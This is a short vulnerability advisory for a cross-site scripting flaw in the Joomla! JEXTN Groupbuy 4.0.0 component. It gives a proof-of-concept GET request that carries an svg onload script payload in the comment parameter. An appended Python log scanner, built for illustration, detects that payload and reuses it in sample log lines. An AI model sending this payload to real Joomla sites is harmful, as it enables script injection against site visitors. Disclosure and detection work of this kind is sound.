Joomla! JEXTN Groupbuy 4.0.0 Cross Site Scripting

The Joomla! JEXTN Groupbuy component, version 4.0.0, suffers from a cross-site scripting (XSS) vulnerability.



################################################
#Title: Joomla! JEXTN Groupbuy 4.0.0 - XSS
#Credit: Bilal KARDADOU
#Vendor: http://www.jextn.com
#URL: https://extensions.joomla.org/extensions/extension/social-web/social-buy/jextn-groupbuy/
#Product: 'Joomla! JEXTN Groupbuy 4.0.0'
#Developer: jextn.com
#Last updated: Jan 04 2016
#Compatibility: 3.X
#Type: Paid download
################################################
#
# GET -p
#
http://127.0.0.1/joomla/index.php?option=com_jegroupbuy&view=jegroupbuy&task=addComments&comment=hello11%3Csvg/onload=prompt(123);%3E&pid=4&tmpl=component
# PoC:
# https://prnt.sc/hul4p1
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/
################################################
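
Added example (not part of the original advisory or the vendor's code): a log check that flags requests to the component's addComments task whose comment parameter decodes to HTML markup, as in the request above. It assumes combined-log-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request target inside a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Heuristic markup indicators: start of a tag, or an inline event-handler attribute.
MARKUP = re.compile(r"<\s*[a-z!/]|\bon[a-z]+\s*=", re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of URL encoding (bounded loop)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_comment(target):
    """Return the decoded `comment` value when the request is the component's
    addComments task and the value contains markup; otherwise None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    first = lambda key: query.get(key, [""])[0].lower()
    if first("option") != "com_jegroupbuy" or first("task") != "addcomments":
        return None
    for raw in query.get("comment", []):
        value = decode_fully(raw)
        if MARKUP.search(value):
            return value
    return None

def scan(log_lines):
    """Yield (line_number, decoded_comment) for every flagged log line."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        hit = suspicious_comment(match.group(1)) if match else None
        if hit is not None:
            yield number, hit

# Constructed sample log lines; line 2 reuses the request shown in the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2018:10:00:00 +0000] "GET /joomla/index.php?option=com_jegroupbuy&view=jegroupbuy&task=addComments&comment=nice+deal&pid=4&tmpl=component HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2018:10:00:05 +0000] "GET /joomla/index.php?option=com_jegroupbuy&view=jegroupbuy&task=addComments&comment=hello11%3Csvg/onload=prompt(123);%3E&pid=4&tmpl=component HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2018:10:00:09 +0000] "GET /joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, comment in scan(SAMPLE_LOG):
        print(f"line {number}: {comment!r}")
```

A hit only shows that markup was submitted to the task; whether it was rendered unescaped depends on the installed component version.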
